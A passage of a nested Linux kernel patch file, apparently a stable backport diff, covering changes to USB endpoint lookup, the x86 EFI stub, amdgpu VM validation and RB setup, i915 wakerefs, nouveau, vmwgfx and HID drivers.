+-				devpriv->ep_rx = ep_desc;
+-			continue;
+-		}
++	struct usb_endpoint_descriptor *ep_rx_desc, *ep_tx_desc;
++	int ret;
+ 
+-		if (usb_endpoint_is_int_out(ep_desc) ||
+-		    usb_endpoint_is_bulk_out(ep_desc)) {
+-			if (!devpriv->ep_tx)
+-				devpriv->ep_tx = ep_desc;
+-			continue;
+-		}
+-	}
++	if (devpriv->model == VMK8061_MODEL)
++		ret = usb_find_common_endpoints(iface_desc, &ep_rx_desc,
++						&ep_tx_desc, NULL, NULL);
++	else
++		ret = usb_find_common_endpoints(iface_desc, NULL, NULL,
++						&ep_rx_desc, &ep_tx_desc);
+ 
+-	if (!devpriv->ep_rx || !devpriv->ep_tx)
++	if (ret)
+ 		return -ENODEV;
+ 
++	devpriv->ep_rx = ep_rx_desc;
++	devpriv->ep_tx = ep_tx_desc;
++
+ 	if (!usb_endpoint_maxp(devpriv->ep_rx) || !usb_endpoint_maxp(devpriv->ep_tx))
+ 		return -EINVAL;
+ 
+diff --git a/drivers/firmware/efi/libstub/Makefile b/drivers/firmware/efi/libstub/Makefile
+index 473ef18421db0..748781c257871 100644
+--- a/drivers/firmware/efi/libstub/Makefile
++++ b/drivers/firmware/efi/libstub/Makefile
+@@ -102,13 +102,6 @@ lib-y				:= $(patsubst %.o,%.stub.o,$(lib-y))
+ # https://bugs.llvm.org/show_bug.cgi?id=46480
+ STUBCOPY_FLAGS-y		+= --remove-section=.note.gnu.property
+ 
+-#
+-# For x86, bootloaders like systemd-boot or grub-efi do not zero-initialize the
+-# .bss section, so the .bss section of the EFI stub needs to be included in the
+-# .data section of the compressed kernel to ensure initialization. Rename the
+-# .bss section here so it's easy to pick out in the linker script.
+-#
+-STUBCOPY_FLAGS-$(CONFIG_X86)	+= --rename-section .bss=.bss.efistub,load,alloc
+ STUBCOPY_RELOC-$(CONFIG_X86_32)	:= R_386_32
+ STUBCOPY_RELOC-$(CONFIG_X86_64)	:= R_X86_64_64
+ 
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index dc50dda40239e..55468debd55d0 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -227,6 +227,15 @@ efi_status_t efi_adjust_memory_range_protection(unsigned long start,
+ 	rounded_end = roundup(start + size, EFI_PAGE_SIZE);
+ 
+ 	if (memattr != NULL) {
++		status = efi_call_proto(memattr, set_memory_attributes,
++					rounded_start,
++					rounded_end - rounded_start,
++					EFI_MEMORY_RO);
++		if (status != EFI_SUCCESS) {
++			efi_warn("Failed to set EFI_MEMORY_RO attribute\n");
++			return status;
++		}
++
+ 		status = efi_call_proto(memattr, clear_memory_attributes,
+ 					rounded_start,
+ 					rounded_end - rounded_start,
+@@ -426,9 +435,8 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 				   efi_system_table_t *sys_table_arg)
+ {
+-	struct boot_params *boot_params;
+-	struct setup_header *hdr;
+-	void *image_base;
++	static struct boot_params boot_params __page_aligned_bss;
++	struct setup_header *hdr = &boot_params.hdr;
+ 	efi_guid_t proto = LOADED_IMAGE_PROTOCOL_GUID;
+ 	int options_size = 0;
+ 	efi_status_t status;
+@@ -449,57 +457,25 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 		efi_exit(handle, status);
+ 	}
+ 
+-	image_base = efi_table_attr(image, image_base);
+-
+-	status = efi_allocate_pages(sizeof(struct boot_params),
+-				    (unsigned long *)&boot_params, ULONG_MAX);
+-	if (status != EFI_SUCCESS) {
+-		efi_err("Failed to allocate lowmem for boot params\n");
+-		efi_exit(handle, status);
+-	}
+-
+-	memset(boot_params, 0x0, sizeof(struct boot_params));
+-
+-	hdr = &boot_params->hdr;
+-
+-	/* Copy the setup header from the second sector to boot_params */
+-	memcpy(&hdr->jump, image_base + 512,
+-	       sizeof(struct setup_header) - offsetof(struct setup_header, jump));
+-
+-	/*
+-	 * Fill out some of the header fields ourselves because the
+-	 * EFI firmware loader doesn't load the first sector.
+-	 */
++	/* Assign the setup_header fields that the kernel actually cares about */
+ 	hdr->root_flags	= 1;
+ 	hdr->vid_mode	= 0xffff;
+-	hdr->boot_flag	= 0xAA55;
+ 
+ 	hdr->type_of_loader = 0x21;
++	hdr->initrd_addr_max = INT_MAX;
+ 
+ 	/* Convert unicode cmdline to ascii */
+ 	cmdline_ptr = efi_convert_cmdline(image, &options_size);
+ 	if (!cmdline_ptr)
+ 		goto fail;
+ 
+-	efi_set_u64_split((unsigned long)cmdline_ptr,
+-			  &hdr->cmd_line_ptr, &boot_params->ext_cmd_line_ptr);
+-
+-	hdr->ramdisk_image = 0;
+-	hdr->ramdisk_size = 0;
++	efi_set_u64_split((unsigned long)cmdline_ptr, &hdr->cmd_line_ptr,
++			  &boot_params.ext_cmd_line_ptr);
+ 
+-	/*
+-	 * Disregard any setup data that was provided by the bootloader:
+-	 * setup_data could be pointing anywhere, and we have no way of
+-	 * authenticating or validating the payload.
+-	 */
+-	hdr->setup_data = 0;
+-
+-	efi_stub_entry(handle, sys_table_arg, boot_params);
++	efi_stub_entry(handle, sys_table_arg, &boot_params);
+ 	/* not reached */
+ 
+ fail:
+-	efi_free(sizeof(struct boot_params), (unsigned long)boot_params);
+-
+ 	efi_exit(handle, status);
+ }
+ 
+@@ -811,7 +787,7 @@ static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
+ 
+ 	*kernel_entry = addr + entry;
+ 
+-	return efi_adjust_memory_range_protection(addr, kernel_total_size);
++	return efi_adjust_memory_range_protection(addr, kernel_text_size);
+ }
+ 
+ static void __noreturn enter_kernel(unsigned long kernel_addr,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 4c661e024e13d..49a47807c42d6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1400,6 +1400,37 @@ static void amdgpu_vm_bo_insert_map(struct amdgpu_device *adev,
+ 	trace_amdgpu_vm_bo_map(bo_va, mapping);
+ }
+ 
++/* Validate operation parameters to prevent potential abuse */
++static int amdgpu_vm_verify_parameters(struct amdgpu_device *adev,
++					  struct amdgpu_bo *bo,
++					  uint64_t saddr,
++					  uint64_t offset,
++					  uint64_t size)
++{
++	uint64_t tmp, lpfn;
++
++	if (saddr & AMDGPU_GPU_PAGE_MASK
++	    || offset & AMDGPU_GPU_PAGE_MASK
++	    || size & AMDGPU_GPU_PAGE_MASK)
++		return -EINVAL;
++
++	if (check_add_overflow(saddr, size, &tmp)
++	    || check_add_overflow(offset, size, &tmp)
++	    || size == 0 /* which also leads to end < begin */)
++		return -EINVAL;
++
++	/* make sure the object fits at this offset */
++	if (bo && offset + size > amdgpu_bo_size(bo))
++		return -EINVAL;
++
++	/* Ensure the last pfn does not exceed max_pfn */
++	lpfn = (saddr + size - 1) >> AMDGPU_GPU_PAGE_SHIFT;
++	if (lpfn >= adev->vm_manager.max_pfn)
++		return -EINVAL;
++
++	return 0;
++}
++
+ /**
+  * amdgpu_vm_bo_map - map bo inside a vm
+  *
+@@ -1426,21 +1457,14 @@ int amdgpu_vm_bo_map(struct amdgpu_device *adev,
+ 	struct amdgpu_bo *bo = bo_va->base.bo;
+ 	struct amdgpu_vm *vm = bo_va->base.vm;
+ 	uint64_t eaddr;
++	int r;
+ 
+-	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
+-		return -EINVAL;
+-	if (saddr + size <= saddr || offset + size <= offset)
+-		return -EINVAL;
+-
+-	/* make sure object fit at this offset */
+-	eaddr = saddr + size - 1;
+-	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+-	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+-		return -EINVAL;
++	r = amdgpu_vm_verify_parameters(adev, bo, saddr, offset, size);
++	if (r)
++		return r;
+ 
+ 	saddr /= AMDGPU_GPU_PAGE_SIZE;
+-	eaddr /= AMDGPU_GPU_PAGE_SIZE;
++	eaddr = saddr + (size - 1) / AMDGPU_GPU_PAGE_SIZE;
+ 
+ 	tmp = amdgpu_vm_it_iter_first(&vm->va, saddr, eaddr);
+ 	if (tmp) {
+@@ -1493,17 +1517,9 @@ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev,
+ 	uint64_t eaddr;
+ 	int r;
+ 
+-	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
+-		return -EINVAL;
+-	if (saddr + size <= saddr || offset + size <= offset)
+-		return -EINVAL;
+-
+-	/* make sure object fit at this offset */
+-	eaddr = saddr + size - 1;
+-	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+-	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+-		return -EINVAL;
++	r = amdgpu_vm_verify_parameters(adev, bo, saddr, offset, size);
++	if (r)
++		return r;
+ 
+ 	/* Allocate all the needed memory */
+ 	mapping = kmalloc(sizeof(*mapping), GFP_KERNEL);
+@@ -1517,7 +1533,7 @@ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev,
+ 	}
+ 
+ 	saddr /= AMDGPU_GPU_PAGE_SIZE;
+-	eaddr /= AMDGPU_GPU_PAGE_SIZE;
++	eaddr = saddr + (size - 1) / AMDGPU_GPU_PAGE_SIZE;
+ 
+ 	mapping->start = saddr;
+ 	mapping->last = eaddr;
+@@ -1604,10 +1620,14 @@ int amdgpu_vm_bo_clear_mappings(struct amdgpu_device *adev,
+ 	struct amdgpu_bo_va_mapping *before, *after, *tmp, *next;
+ 	LIST_HEAD(removed);
+ 	uint64_t eaddr;
++	int r;
++
++	r = amdgpu_vm_verify_parameters(adev, NULL, saddr, 0, size);
++	if (r)
++		return r;
+ 
+-	eaddr = saddr + size - 1;
+ 	saddr /= AMDGPU_GPU_PAGE_SIZE;
+-	eaddr /= AMDGPU_GPU_PAGE_SIZE;
++	eaddr = saddr + (size - 1) / AMDGPU_GPU_PAGE_SIZE;
+ 
+ 	/* Allocate all the needed memory */
+ 	before = kzalloc(sizeof(*before), GFP_KERNEL);
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 66a6f7a37ebcf..5a5787bfbce7f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -1531,44 +1531,70 @@ static void gfx_v11_0_select_se_sh(struct amdgpu_device *adev, u32 se_num,
+ 	WREG32_SOC15(GC, 0, regGRBM_GFX_INDEX, data);
+ }
+ 
+-static u32 gfx_v11_0_get_rb_active_bitmap(struct amdgpu_device *adev)
++static u32 gfx_v11_0_get_sa_active_bitmap(struct amdgpu_device *adev)
+ {
+-	u32 data, mask;
++	u32 gc_disabled_sa_mask, gc_user_disabled_sa_mask, sa_mask;
++
++	gc_disabled_sa_mask = RREG32_SOC15(GC, 0, regCC_GC_SA_UNIT_DISABLE);
++	gc_disabled_sa_mask = REG_GET_FIELD(gc_disabled_sa_mask,
++					   CC_GC_SA_UNIT_DISABLE,
++					   SA_DISABLE);
++	gc_user_disabled_sa_mask = RREG32_SOC15(GC, 0, regGC_USER_SA_UNIT_DISABLE);
++	gc_user_disabled_sa_mask = REG_GET_FIELD(gc_user_disabled_sa_mask,
++						 GC_USER_SA_UNIT_DISABLE,
++						 SA_DISABLE);
++	sa_mask = amdgpu_gfx_create_bitmask(adev->gfx.config.max_sh_per_se *
++					    adev->gfx.config.max_shader_engines);
+ 
+-	data = RREG32_SOC15(GC, 0, regCC_RB_BACKEND_DISABLE);
+-	data |= RREG32_SOC15(GC, 0, regGC_USER_RB_BACKEND_DISABLE);
++	return sa_mask & (~(gc_disabled_sa_mask | gc_user_disabled_sa_mask));
++}
+ 
+-	data &= CC_RB_BACKEND_DISABLE__BACKEND_DISABLE_MASK;
+-	data >>= GC_USER_RB_BACKEND_DISABLE__BACKEND_DISABLE__SHIFT;
++static u32 gfx_v11_0_get_rb_active_bitmap(struct amdgpu_device *adev)
++{
++	u32 gc_disabled_rb_mask, gc_user_disabled_rb_mask;
++	u32 rb_mask;
+ 
+-	mask = amdgpu_gfx_create_bitmask(adev->gfx.config.max_backends_per_se /
+-					 adev->gfx.config.max_sh_per_se);
++	gc_disabled_rb_mask = RREG32_SOC15(GC, 0, regCC_RB_BACKEND_DISABLE);
++	gc_disabled_rb_mask = REG_GET_FIELD(gc_disabled_rb_mask,
++					    CC_RB_BACKEND_DISABLE,
++					    BACKEND_DISABLE);
++	gc_user_disabled_rb_mask = RREG32_SOC15(GC, 0, regGC_USER_RB_BACKEND_DISABLE);
++	gc_user_disabled_rb_mask = REG_GET_FIELD(gc_user_disabled_rb_mask,
++						 GC_USER_RB_BACKEND_DISABLE,
++						 BACKEND_DISABLE);
++	rb_mask = amdgpu_gfx_create_bitmask(adev->gfx.config.max_backends_per_se *
++					    adev->gfx.config.max_shader_engines);
+ 
+-	return (~data) & mask;
++	return rb_mask & (~(gc_disabled_rb_mask | gc_user_disabled_rb_mask));
+ }
+ 
+ static void gfx_v11_0_setup_rb(struct amdgpu_device *adev)
+ {
+-	int i, j;
+-	u32 data;
+-	u32 active_rbs = 0;
+-	u32 rb_bitmap_width_per_sh = adev->gfx.config.max_backends_per_se /
+-					adev->gfx.config.max_sh_per_se;
++	u32 rb_bitmap_width_per_sa;
++	u32 max_sa;
++	u32 active_sa_bitmap;
++	u32 global_active_rb_bitmap;
++	u32 active_rb_bitmap = 0;
++	u32 i;
+ 
+-	mutex_lock(&adev->grbm_idx_mutex);
+-	for (i = 0; i < adev->gfx.config.max_shader_engines; i++) {
+-		for (j = 0; j < adev->gfx.config.max_sh_per_se; j++) {
+-			gfx_v11_0_select_se_sh(adev, i, j, 0xffffffff);
+-			data = gfx_v11_0_get_rb_active_bitmap(adev);
+-			active_rbs |= data << ((i * adev->gfx.config.max_sh_per_se + j) *
+-					       rb_bitmap_width_per_sh);
+-		}
++	/* query sa bitmap from SA_UNIT_DISABLE registers */
++	active_sa_bitmap = gfx_v11_0_get_sa_active_bitmap(adev);
++	/* query rb bitmap from RB_BACKEND_DISABLE registers */
++	global_active_rb_bitmap = gfx_v11_0_get_rb_active_bitmap(adev);
++
++	/* generate active rb bitmap according to active sa bitmap */
++	max_sa = adev->gfx.config.max_shader_engines *
++		 adev->gfx.config.max_sh_per_se;
++	rb_bitmap_width_per_sa = adev->gfx.config.max_backends_per_se /
++				 adev->gfx.config.max_sh_per_se;
++	for (i = 0; i < max_sa; i++) {
++		if (active_sa_bitmap & (1 << i))
++			active_rb_bitmap |= (0x3 << (i * rb_bitmap_width_per_sa));
+ 	}
+-	gfx_v11_0_select_se_sh(adev, 0xffffffff, 0xffffffff, 0xffffffff);
+-	mutex_unlock(&adev->grbm_idx_mutex);
+ 
+-	adev->gfx.config.backend_enable_mask = active_rbs;
+-	adev->gfx.config.num_rbs = hweight32(active_rbs);
++	active_rb_bitmap &= global_active_rb_bitmap;
++	adev->gfx.config.backend_enable_mask = active_rb_bitmap;
++	adev->gfx.config.num_rbs = hweight32(active_rb_bitmap);
+ }
+ 
+ #define DEFAULT_SH_MEM_BASES	(0x6000)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+index a974f86e718a8..37c645a882dd8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+@@ -216,9 +216,6 @@ static void optc32_setup_manual_trigger(struct timing_generator *optc)
+ 				OTG_V_TOTAL_MAX_SEL, 1,
+ 				OTG_FORCE_LOCK_ON_EVENT, 0,
+ 				OTG_SET_V_TOTAL_MIN_MASK, (1 << 1)); /* TRIGA */
+-
+-		// Setup manual flow control for EOF via TRIG_A
+-		optc->funcs->setup_manual_trigger(optc);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 3fe5e6439c401..aa93129c3397e 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -348,6 +348,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Legion Go 8APU1 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Legion Go 8APU1"),
++		},
++		.driver_data = (void *)&lcd1600x2560_leftside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
+diff --git a/drivers/gpu/drm/i915/i915_vma.c b/drivers/gpu/drm/i915/i915_vma.c
+index c8ad8f37e5cfe..58a03da16a10f 100644
+--- a/drivers/gpu/drm/i915/i915_vma.c
++++ b/drivers/gpu/drm/i915/i915_vma.c
+@@ -32,6 +32,7 @@
+ #include "gt/intel_engine.h"
+ #include "gt/intel_engine_heartbeat.h"
+ #include "gt/intel_gt.h"
++#include "gt/intel_gt_pm.h"
+ #include "gt/intel_gt_requests.h"
+ 
+ #include "i915_drv.h"
+@@ -98,12 +99,34 @@ static inline struct i915_vma *active_to_vma(struct i915_active *ref)
+ 
+ static int __i915_vma_active(struct i915_active *ref)
+ {
+-	return i915_vma_tryget(active_to_vma(ref)) ? 0 : -ENOENT;
++	struct i915_vma *vma = active_to_vma(ref);
++
++	if (!i915_vma_tryget(vma))
++		return -ENOENT;
++
++	/*
++	 * Exclude the global GTT VMA from holding a GT wakeref
++	 * while active; otherwise the GPU never goes idle.
++	 */
++	if (!i915_vma_is_ggtt(vma))
++		intel_gt_pm_get(vma->vm->gt);
++
++	return 0;
+ }
+ 
+ static void __i915_vma_retire(struct i915_active *ref)
+ {
+-	i915_vma_put(active_to_vma(ref));
++	struct i915_vma *vma = active_to_vma(ref);
++
++	if (!i915_vma_is_ggtt(vma)) {
++		/*
++		 * Since we can be called from atomic contexts,
++		 * use an async variant of intel_gt_pm_put().
++		 */
++		intel_gt_pm_put_async(vma->vm->gt);
++	}
++
++	i915_vma_put(vma);
+ }
+ 
+ static struct i915_vma *
+@@ -1365,7 +1388,7 @@ int i915_vma_pin_ww(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 	struct i915_vma_work *work = NULL;
+ 	struct dma_fence *moving = NULL;
+ 	struct i915_vma_resource *vma_res = NULL;
+-	intel_wakeref_t wakeref = 0;
++	intel_wakeref_t wakeref;
+ 	unsigned int bound;
+ 	int err;
+ 
+@@ -1385,8 +1408,14 @@ int i915_vma_pin_ww(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 	if (err)
+ 		return err;
+ 
+-	if (flags & PIN_GLOBAL)
+-		wakeref = intel_runtime_pm_get(&vma->vm->i915->runtime_pm);
++	/*
++	 * In case of a global GTT, we must hold a runtime-pm wakeref
++	 * while global PTEs are updated.  In other cases, we hold
++	 * the rpm reference while the VMA is active.  Since runtime
++	 * resume may require allocations, which are forbidden inside
++	 * vm->mutex, get the first rpm wakeref outside of the mutex.
++	 */
++	wakeref = intel_runtime_pm_get(&vma->vm->i915->runtime_pm);
+ 
+ 	if (flags & vma->vm->bind_async_flags) {
+ 		/* lock VM */
+@@ -1522,8 +1551,7 @@ int i915_vma_pin_ww(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 	if (work)
+ 		dma_fence_work_commit_imm(&work->base);
+ err_rpm:
+-	if (wakeref)
+-		intel_runtime_pm_put(&vma->vm->i915->runtime_pm, wakeref);
++	intel_runtime_pm_put(&vma->vm->i915->runtime_pm, wakeref);
+ 
+ 	if (moving)
+ 		dma_fence_put(moving);
+diff --git a/drivers/gpu/drm/nouveau/nouveau_bios.c b/drivers/gpu/drm/nouveau/nouveau_bios.c
+index 189903b65edc9..48cf593383b34 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_bios.c
++++ b/drivers/gpu/drm/nouveau/nouveau_bios.c
+@@ -23,6 +23,7 @@
+  */
+ 
+ #include "nouveau_drv.h"
++#include "nouveau_bios.h"
+ #include "nouveau_reg.h"
+ #include "dispnv04/hw.h"
+ #include "nouveau_encoder.h"
+@@ -1675,7 +1676,7 @@ apply_dcb_encoder_quirks(struct drm_device *dev, int idx, u32 *conn, u32 *conf)
+ 	 */
+ 	if (nv_match_device(dev, 0x0201, 0x1462, 0x8851)) {
+ 		if (*conn == 0xf2005014 && *conf == 0xffffffff) {
+-			fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 1, 1, 1);
++			fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 1, 1, DCB_OUTPUT_B);
+ 			return false;
+ 		}
+ 	}
+@@ -1761,26 +1762,26 @@ fabricate_dcb_encoder_table(struct drm_device *dev, struct nvbios *bios)
+ #ifdef __powerpc__
+ 	/* Apple iMac G4 NV17 */
+ 	if (of_machine_is_compatible("PowerMac4,5")) {
+-		fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 0, all_heads, 1);
+-		fabricate_dcb_output(dcb, DCB_OUTPUT_ANALOG, 1, all_heads, 2);
++		fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 0, all_heads, DCB_OUTPUT_B);
++		fabricate_dcb_output(dcb, DCB_OUTPUT_ANALOG, 1, all_heads, DCB_OUTPUT_C);
+ 		return;
+ 	}
+ #endif
+ 
+ 	/* Make up some sane defaults */
+ 	fabricate_dcb_output(dcb, DCB_OUTPUT_ANALOG,
+-			     bios->legacy.i2c_indices.crt, 1, 1);
++			     bios->legacy.i2c_indices.crt, 1, DCB_OUTPUT_B);
+ 
+ 	if (nv04_tv_identify(dev, bios->legacy.i2c_indices.tv) >= 0)
+ 		fabricate_dcb_output(dcb, DCB_OUTPUT_TV,
+ 				     bios->legacy.i2c_indices.tv,
+-				     all_heads, 0);
++				     all_heads, DCB_OUTPUT_A);
+ 
+ 	else if (bios->tmds.output0_script_ptr ||
+ 		 bios->tmds.output1_script_ptr)
+ 		fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS,
+ 				     bios->legacy.i2c_indices.panel,
+-				     all_heads, 1);
++				     all_heads, DCB_OUTPUT_B);
+ }
+ 
+ static int
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c b/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c
+index c51bac76174c1..9fe5b6a36ab98 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c
+@@ -221,8 +221,11 @@ nv50_instobj_acquire(struct nvkm_memory *memory)
+ 	void __iomem *map = NULL;
+ 
+ 	/* Already mapped? */
+-	if (refcount_inc_not_zero(&iobj->maps))
++	if (refcount_inc_not_zero(&iobj->maps)) {
++		/* read barrier match the wmb on refcount set */
++		smp_rmb();
+ 		return iobj->map;
++	}
+ 
+ 	/* Take the lock, and re-check that another thread hasn't
+ 	 * already mapped the object in the meantime.
+@@ -249,6 +252,8 @@ nv50_instobj_acquire(struct nvkm_memory *memory)
+ 			iobj->base.memory.ptrs = &nv50_instobj_fast;
+ 		else
+ 			iobj->base.memory.ptrs = &nv50_instobj_slow;
++		/* barrier to ensure the ptrs are written before refcount is set */
++		smp_wmb();
+ 		refcount_set(&iobj->maps, 1);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panel/panel-visionox-rm69299.c b/drivers/gpu/drm/panel/panel-visionox-rm69299.c
+index ec228c269146f..b380bbb0e0d0a 100644
+--- a/drivers/gpu/drm/panel/panel-visionox-rm69299.c
++++ b/drivers/gpu/drm/panel/panel-visionox-rm69299.c
+@@ -261,8 +261,6 @@ static void visionox_rm69299_remove(struct mipi_dsi_device *dsi)
+ 	struct visionox_rm69299 *ctx = mipi_dsi_get_drvdata(dsi);
+ 
+ 	mipi_dsi_detach(ctx->dsi);
+-	mipi_dsi_device_unregister(ctx->dsi);
+-
+ 	drm_panel_remove(&ctx->panel);
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index 9d7a1b710f48f..53f63ad656a41 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -663,11 +663,12 @@ static int vmw_dma_select_mode(struct vmw_private *dev_priv)
+ 		[vmw_dma_map_populate] = "Caching DMA mappings.",
+ 		[vmw_dma_map_bind] = "Giving up DMA mappings early."};
+ 
+-	/* TTM currently doesn't fully support SEV encryption. */
+-	if (cc_platform_has(CC_ATTR_MEM_ENCRYPT))
+-		return -EINVAL;
+-
+-	if (vmw_force_coherent)
++	/*
++	 * When running with SEV we always want DMA mappings, because
++	 * otherwise TTM tt pool pages will bounce through swiotlb and
++	 * run it out of available space.
++	 */
++	if (vmw_force_coherent || cc_platform_has(CC_ATTR_MEM_ENCRYPT))
+ 		dev_priv->map_mode = vmw_dma_alloc_coherent;
+ 	else if (vmw_restrict_iommu)
+ 		dev_priv->map_mode = vmw_dma_map_bind;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index aa571b75cd07f..b1aed051b41ab 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -793,6 +793,7 @@ int vmw_du_cursor_plane_atomic_check(struct drm_plane *plane,
+ int vmw_du_crtc_atomic_check(struct drm_crtc *crtc,
+ 			     struct drm_atomic_state *state)
+ {
++	struct vmw_private *vmw = vmw_priv(crtc->dev);
+ 	struct drm_crtc_state *new_state = drm_atomic_get_new_crtc_state(state,
+ 									 crtc);
+ 	struct vmw_display_unit *du = vmw_crtc_to_du(new_state->crtc);
+@@ -800,9 +801,13 @@ int vmw_du_crtc_atomic_check(struct drm_crtc *crtc,
+ 	bool has_primary = new_state->plane_mask &
+ 			   drm_plane_mask(crtc->primary);
+ 
+-	/* We always want to have an active plane with an active CRTC */
+-	if (has_primary != new_state->enable)
+-		return -EINVAL;
++	/*
++	 * This is fine in general, but broken userspace might expect
++	 * some actual rendering, so give a clue as to why it's blank.
++	 */
++	if (new_state->enable && !has_primary)
++		drm_dbg_driver(&vmw->drm,
++			       "CRTC without a primary plane will be blank.\n");
+ 
+ 
+ 	if (new_state->connector_mask != connector_mask &&
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index b02d2793659f9..b116600b343a8 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -246,10 +246,10 @@ struct vmw_framebuffer_bo {
+ 
+ 
+ static const uint32_t __maybe_unused vmw_primary_plane_formats[] = {
+-	DRM_FORMAT_XRGB1555,
+-	DRM_FORMAT_RGB565,
+ 	DRM_FORMAT_XRGB8888,
+ 	DRM_FORMAT_ARGB8888,
++	DRM_FORMAT_RGB565,
++	DRM_FORMAT_XRGB1555,
+ };
+ 
+ static const uint32_t __maybe_unused vmw_cursor_plane_formats[] = {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 1be454bafcb91..405d88b08908d 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -717,10 +717,10 @@
+ #define USB_DEVICE_ID_KYE_GPEN_560	0x5003
+ #define USB_DEVICE_ID_KYE_EASYPEN_I405X	0x5010
+ #define USB_DEVICE_ID_KYE_MOUSEPEN_I608X	0x5011
+-#define USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2	0x501a
+ #define USB_DEVICE_ID_KYE_EASYPEN_M610X	0x5013
+ #define USB_DEVICE_ID_KYE_PENSKETCH_M912	0x5015
+ #define USB_DEVICE_ID_KYE_EASYPEN_M406XE	0x5019
++#define USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2	0x501A
+ 
+ #define USB_VENDOR_ID_LABTEC		0x1020
+ #define USB_DEVICE_ID_LABTEC_WIRELESS_KEYBOARD	0x0006
+diff --git a/drivers/hid/hid-kye.c b/drivers/hid/hid-kye.c
+index da903138eee49..dc57e9d4a3e20 100644
+--- a/drivers/hid/hid-kye.c
++++ b/drivers/hid/hid-kye.c
+@@ -602,6 +602,18 @@ static __u8 *kye_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 			rdesc[74] = 0x08;
+ 		}
+ 		break;
++	case USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE:
++		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
++					"Genius Gila Gaming Mouse");
++		break;
++	case USB_DEVICE_ID_GENIUS_MANTICORE:
++		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
++					"Genius Manticore Keyboard");
++		break;
